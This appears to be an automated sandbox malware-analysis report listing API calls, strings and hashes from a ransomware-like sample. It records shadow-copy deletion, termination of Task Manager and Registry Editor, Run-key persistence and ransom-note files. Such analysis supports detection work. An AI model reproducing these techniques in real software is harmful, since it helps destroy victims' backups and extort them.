                                                                                                                            • API String ID: 2119192008-1900680373
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: wcsstr$Process$_memset$CloseEnumExitFileHandleImageNameOpenProcessesSleepTerminateThread
                                                                                                                            • String ID: cmd.exe$msconfig$procexp$regedit$taskmgr
                                                                                                                            • API String ID: 1297472855-1900680373
                                                                                                                            APIs
                                                                                                                            • RegCreateKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,00000000,00000000,00020006,00000000,0041D95E,00000000), ref: 0041E183
                                                                                                                            • RegSetValueExW.ADVAPI32 ref: 0041E19E
                                                                                                                            • RegFlushKey.ADVAPI32(0041D95E), ref: 0041E1AA
                                                                                                                            • RegCloseKey.ADVAPI32(0041D95E), ref: 0041E1B0
                                                                                                                            • RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 0041E1D3
                                                                                                                            • RegSetValueExW.ADVAPI32 ref: 0041E206
                                                                                                                            • RegFlushKey.ADVAPI32(?), ref: 0041E20C
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0041E212
                                                                                                                            • RegCreateKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 0041E235
                                                                                                                            • RegSetValueExW.ADVAPI32 ref: 0041E266
                                                                                                                            • RegFlushKey.ADVAPI32(?), ref: 0041E26C
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0041E272
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateFlushValue
                                                                                                                            • String ID: kL$ kL$EnableLinkedConnections$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                            • API String ID: 607596385-2765528930
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0041D231
                                                                                                                            • _memset.LIBCMT ref: 0041D244
                                                                                                                            • _memset.LIBCMT ref: 0041D257
                                                                                                                            • GetEnvironmentVariableW.KERNEL32(windir,?,00000208), ref: 0041D270
                                                                                                                              • Part of subcall function 0041D1A0: _vsnwprintf.NTDLL ref: 0041D1CF
                                                                                                                            • _memset.LIBCMT ref: 0041D2E2
                                                                                                                            • ShellExecuteExW.SHELL32(?), ref: 0041D337
                                                                                                                            • GetLastError.KERNEL32 ref: 0041D350
                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 0041D35E
                                                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 0041D367
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0041D376
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$ExecuteShell$CloseEnvironmentErrorHandleLastSleepVariable_vsnwprintf
                                                                                                                            • String ID: /c start "" "%s"$%s\system32\cmd.exe$<$@$DfC$windir
                                                                                                                            • API String ID: 3370961082-4193238480
                                                                                                                            • Opcode ID: c3e4274e274cfd2eb9d096d767df97df51c952df6807cfc6eb756e516c041e78
                                                                                                                            • Instruction ID: 9fd5859a90402e78b6874ceda3f8e209096e6d3a03dae52f113e5a618079a305
                                                                                                                            • Opcode Fuzzy Hash: c3e4274e274cfd2eb9d096d767df97df51c952df6807cfc6eb756e516c041e78
                                                                                                                            • Instruction Fuzzy Hash: 5A31A5F1E0021CA6DB20DB55DC45FDA73B8EB48704F4085AAE648E6181DB799AC4CFED
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExecuteShell_memset_strcat_s$CloseErrorExitHandleLastSleepThread
                                                                                                                            • String ID: <$@$delete $shadows /all /Quiet $xfC
                                                                                                                            • API String ID: 745248852-859559790
                                                                                                                            • Opcode ID: d365b7de738bec6b482e9685b861eebe7afb23725a0c7d70ce78bc4f28557df3
                                                                                                                            • Instruction ID: 9c1bbf38363198c24e56f9ed804daa07495aa1b6d26b64f44dc71bd627e4087d
                                                                                                                            • Opcode Fuzzy Hash: d365b7de738bec6b482e9685b861eebe7afb23725a0c7d70ce78bc4f28557df3
                                                                                                                            • Instruction Fuzzy Hash: 5E31A9B09002289BDB20DF61DC81FDE7778EB18744F41449AE248A7250D7B8AEC4CF98
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 004134DA
                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 00413555
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile_memset
                                                                                                                            • String ID: +M$.html$.txt$\restore_files_
                                                                                                                            • API String ID: 3830271748-1530502143
                                                                                                                            • Opcode ID: d09b1184c7a8454e68dfcebd0a0b01cc57f6a79f606d5f0b09e1a9284c8d9e2d
                                                                                                                            • Instruction ID: b0ebde83edd008dc97222ab2d2d2e2d3358175b2e1a9e19fbf5c8bd48a48a3a8
                                                                                                                            • Opcode Fuzzy Hash: d09b1184c7a8454e68dfcebd0a0b01cc57f6a79f606d5f0b09e1a9284c8d9e2d
                                                                                                                            • Instruction Fuzzy Hash: E6516A3160032065E725AF208C86FE77365EF28754F5002A6F744AB2C5E779AB84C79C
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0041E300: GetDC.USER32(00000000), ref: 0041E30E
                                                                                                                              • Part of subcall function 0041E300: CreateCompatibleBitmap.GDI32(00000000,0000047E,000002BC), ref: 0041E35A
                                                                                                                              • Part of subcall function 0041E300: CreateCompatibleDC.GDI32(00000000), ref: 0041E367
                                                                                                                              • Part of subcall function 0041E300: SelectObject.GDI32(00000000,00000000), ref: 0041E375
                                                                                                                              • Part of subcall function 0041E300: SetBkMode.GDI32(00000000,00000001), ref: 0041E381
                                                                                                                              • Part of subcall function 0041E300: SetTextColor.GDI32(00000000,00FFFFFF), ref: 0041E38D
                                                                                                                              • Part of subcall function 0041E300: SelectObject.GDI32(00000000,75D53C29), ref: 0041E3A0
                                                                                                                              • Part of subcall function 0041E300: DeleteDC.GDI32(00000000), ref: 0041E3A7
                                                                                                                              • Part of subcall function 0041E300: ReleaseDC.USER32(00000000,00000000), ref: 0041E3BA
                                                                                                                              • Part of subcall function 0041E300: DeleteObject.GDI32(00000000), ref: 0041E3CB
                                                                                                                            • GetDC.USER32(00000000), ref: 0041E4A2
                                                                                                                            • GetDIBits.GDI32 ref: 0041E4DB
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041E4E4
                                                                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0041E522
                                                                                                                            • WriteFile.KERNEL32(00000000,?,0000000E,?,00000000), ref: 0041E53E
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000028,?,00000000), ref: 0041E55B
                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0041E573
                                                                                                                            • FlushFileBuffers.KERNEL32(00000000), ref: 0041E57A
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041E581
                                                                                                                            • DeleteObject.GDI32(?), ref: 0041E595
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Object$CreateDeleteWrite$CompatibleReleaseSelect$BitmapBitsBuffersCloseColorFlushHandleModeText
                                                                                                                            • String ID: ($6
                                                                                                                            • API String ID: 666674223-4149066357
                                                                                                                            • Opcode ID: 06ac5d28294c8e6622ef96abb61ed0812d4c04e077a74d001cbdd98fdbf226e2
                                                                                                                            • Instruction ID: 06a2a779e1feef08f14fc2e11d98cd6d7394d97c17aae2770a884c198b9b7a13
                                                                                                                            • Opcode Fuzzy Hash: 06ac5d28294c8e6622ef96abb61ed0812d4c04e077a74d001cbdd98fdbf226e2
                                                                                                                            • Instruction Fuzzy Hash: F6414D71618340ABD310DFA4DD45B9FB7F8EFC9704F004A1EF68596290E7B499448BAB
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004010A0: std::exception::exception.LIBCMT ref: 00401116
                                                                                                                              • Part of subcall function 004010A0: __CxxThrowException@8.LIBCMT ref: 0040112B
                                                                                                                            • std::exception::exception.LIBCMT ref: 00401514
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0040152F
                                                                                                                            • std::exception::exception.LIBCMT ref: 00401573
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00401588
                                                                                                                            • std::exception::exception.LIBCMT ref: 0040171A
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0040172F
                                                                                                                            • std::exception::exception.LIBCMT ref: 00401777
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0040178C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Exception@8Throwstd::exception::exception
                                                                                                                            • String ID: failed$4C$4C
                                                                                                                            • API String ID: 3728558374-858053814
                                                                                                                            • Opcode ID: 1708425a60af2b91427465b3e876a342997327ddb468002a55ec4e15827a5f46
                                                                                                                            • Instruction ID: 36413a6523f9bf71e860ab9fa8cf4e802c959e55f4098fbd293934a26d275bda
                                                                                                                            • Opcode Fuzzy Hash: 1708425a60af2b91427465b3e876a342997327ddb468002a55ec4e15827a5f46
                                                                                                                            • Instruction Fuzzy Hash: 0A029E70D002689BDB21CFA5CC80BDEBBB4BF59304F1485ABE405BB281D7B95A85CF95
                                                                                                                            APIs
                                                                                                                            • RegCreateKeyExW.ADVAPI32(80000003,\S-1-5-18\Software\msys\,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 00401A59
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00401AE2
                                                                                                                            • RegQueryValueExW.ADVAPI32(00000000,0043343C,00000000,?,0043CA20,00000008), ref: 00401A81
                                                                                                                              • Part of subcall function 00402DE0: __strftime_l.LIBCMT ref: 00402DF2
                                                                                                                            • RegCreateKeyExW.ADVAPI32(80000001,Software\msys\,00000000,00000000,00000000,0002001F,00000000,00000000,00000000), ref: 00401B10
                                                                                                                            • RegQueryValueExW.ADVAPI32(00000000,0043343C,00000000,?,0043CA20,00000008), ref: 00401B2A
                                                                                                                            • RegSetValueExW.ADVAPI32 ref: 00401B6A
                                                                                                                            • RegFlushKey.ADVAPI32(00000000), ref: 00401B74
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00401BD5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$CloseCreateQuery$Flush__strftime_l
                                                                                                                            • String ID: %X%X%X%X%X%X%X%X$Software\msys\$\S-1-5-18\Software\msys\
                                                                                                                            • API String ID: 1839477016-2754814859
                                                                                                                            • Opcode ID: c27c1d22e556df01829b08983ba4e0426eb24db553ffa7f2585890b6bb95cac8
                                                                                                                            • Instruction ID: 9685e600e0c5b42de14bfeeca4ed7f4a10fcdf9f0481810e012af34b19a7429f
                                                                                                                            • Opcode Fuzzy Hash: c27c1d22e556df01829b08983ba4e0426eb24db553ffa7f2585890b6bb95cac8
                                                                                                                            • Instruction Fuzzy Hash: 84410B717642A87AD710E7A5AC81F7A7BFC974DB01F10906AF640B61D1D2F8AB009B7C
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0041DC8E
                                                                                                                            • CreateFileW.KERNEL32 ref: 0041DCEA
                                                                                                                            • WriteFile.KERNEL32(00000000,004BCE20,004BCE21,00000000,00000000), ref: 0041DD24
                                                                                                                            • FlushFileBuffers.KERNEL32(00000000), ref: 0041DD2D
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041DD30
                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0041DD83
                                                                                                                            • WriteFile.KERNEL32(00000000,004C0CA0,004C0CA1,?,00000000), ref: 0041DDB1
                                                                                                                            • FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,756F3475,?,0041DAE7), ref: 0041DDB4
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041DDB7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$BuffersCloseCreateFlushHandleWrite$_memset
                                                                                                                            • String ID: \RESTORE_FILES.HTML$\RESTORE_FILES.TXT
                                                                                                                            • API String ID: 914705027-2095582212
                                                                                                                            APIs
                                                                                                                            • GetDC.USER32(00000000), ref: 0041E30E
                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,0000047E,000002BC), ref: 0041E35A
                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0041E367
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041E375
                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 0041E381
                                                                                                                            • SetTextColor.GDI32(00000000,00FFFFFF), ref: 0041E38D
                                                                                                                              • Part of subcall function 0041E280: CreateFontW.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000020,Tahoma), ref: 0041E2A3
                                                                                                                              • Part of subcall function 0041E280: SelectObject.GDI32(00000000,00000000), ref: 0041E2AD
                                                                                                                              • Part of subcall function 0041E280: DrawTextA.USER32(00000000,004BCE20,000000FF,?,00000400), ref: 0041E2CE
                                                                                                                              • Part of subcall function 0041E280: DrawTextA.USER32(00000000,004BCE20,000000FF,?,00000010), ref: 0041E2DF
                                                                                                                              • Part of subcall function 0041E280: GetStockObject.GDI32(0000000D), ref: 0041E2E7
                                                                                                                              • Part of subcall function 0041E280: SelectObject.GDI32(00000000,00000000), ref: 0041E2EF
                                                                                                                              • Part of subcall function 0041E280: DeleteObject.GDI32(00000000), ref: 0041E2F6
                                                                                                                            • SelectObject.GDI32(00000000,75D53C29), ref: 0041E3A0
                                                                                                                            • DeleteDC.GDI32(00000000), ref: 0041E3A7
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041E3BA
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0041E3CB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Object$Select$CreateDeleteText$CompatibleDraw$BitmapColorFontModeReleaseStock
                                                                                                                            • String ID: u4ou
                                                                                                                            • API String ID: 1917954226-2630692901
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CountTick$FreeLibrary
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2835676872-0
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0040192C
                                                                                                                            • _memset.LIBCMT ref: 00401970
                                                                                                                            • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 004019CA
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,data,00000000,?,0043CA58,00000108), ref: 004019F1
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401A00
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$CloseCreateQueryValue
                                                                                                                            • String ID: S-1-5-18\Software\%s$Software\%s$data
                                                                                                                            • API String ID: 37298109-1164834365
                                                                                                                            APIs
                                                                                                                            • CreateFontW.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000020,Tahoma), ref: 0041E2A3
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041E2AD
                                                                                                                            • DrawTextA.USER32(00000000,004BCE20,000000FF,?,00000400), ref: 0041E2CE
                                                                                                                            • DrawTextA.USER32(00000000,004BCE20,000000FF,?,00000010), ref: 0041E2DF
                                                                                                                            • GetStockObject.GDI32(0000000D), ref: 0041E2E7
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041E2EF
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0041E2F6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Object$DrawSelectText$CreateDeleteFontStock
                                                                                                                            • String ID: Tahoma
                                                                                                                            • API String ID: 176621763-3580928618
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0040210C
                                                                                                                            • _memset.LIBCMT ref: 00402126
                                                                                                                            • _free.LIBCMT ref: 0040237B
                                                                                                                            • _memset.LIBCMT ref: 00402448
                                                                                                                              • Part of subcall function 0041B9A0: _memmove.LIBCMT ref: 0041B9DF
                                                                                                                              • Part of subcall function 0041BA80: _memset.LIBCMT ref: 0041BAA8
                                                                                                                              • Part of subcall function 0041BA80: _memset.LIBCMT ref: 0041BAD1
                                                                                                                              • Part of subcall function 0041BA80: _memset.LIBCMT ref: 0041BB24
                                                                                                                              • Part of subcall function 0041F020: _memset.LIBCMT ref: 0041F047
                                                                                                                              • Part of subcall function 00402740: memmove.NTDLL(?,00000000,?,0040253A), ref: 00402773
                                                                                                                            • _memmove.LIBCMT ref: 00402573
                                                                                                                            • __time64.LIBCMT ref: 00402580
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$_memmove$__time64_freememmove
                                                                                                                            • String ID: lIC
                                                                                                                            • API String ID: 2817571782-1893863216
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00401869
                                                                                                                              • Part of subcall function 00402DC0: __strftime_l.LIBCMT ref: 00402DD5
                                                                                                                            • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 004018AE
                                                                                                                            • RegSetValueExW.ADVAPI32 ref: 004018CE
                                                                                                                            • RegFlushKey.ADVAPI32(?), ref: 004018DB
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004018E8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateFlushValue__strftime_l_memset
                                                                                                                            • String ID: Software\%s$data
                                                                                                                            • API String ID: 664986230-2588080539
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Load$Icon$ClassCursorRegister
                                                                                                                            • String ID: 0$SCAN$m
